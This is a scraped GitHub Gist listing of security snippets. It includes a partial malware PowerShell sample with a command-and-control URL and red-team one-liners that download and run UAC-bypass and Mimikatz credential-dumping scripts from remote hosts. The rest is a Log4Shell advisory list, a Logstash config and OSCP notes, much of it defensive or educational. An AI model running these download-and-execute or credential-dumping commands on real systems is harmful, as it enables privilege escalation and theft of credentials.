Skip to content

Instantly share code, notes, and snippets.

View kevXZY's full-sized avatar
🏠
Working from home

Kevin kevXZY

🏠
Working from home
  • Paris
View GitHub Profile
@infernoboy
infernoboy / danger.ps1
Created April 8, 2022 23:39
This script was found in a malicious file not being detected by any AV as reported by virustotal
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "http://api.private-chatting.com/connect";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
}
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active November 8, 2024 17:29
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Internet health:
ISC: http://www.isc.org
NetCraft: http://news.netcraft.com/
US-CERT: http://www.US-Cert.gov
General technology and security trends:
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
@linuxmalaysia
linuxmalaysia / logstash-windows-events.txt
Last active March 15, 2024 13:51
logstash windows events from winlogbeat. Translate common Event ID's and Translate common Event ID's to Quadrants
input {
beats {
id => "01-beats-input"
port => 55044
tags => "winlogbeat"
}
}
@vortexau
vortexau / decompress.ps1
Last active October 24, 2024 19:35
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
@mubix
mubix / infosec_newbie.md
Last active November 7, 2024 19:11
How to start in Infosec

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@HarmJ0y
HarmJ0y / keepass2john.py
Created June 30, 2016 06:02
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#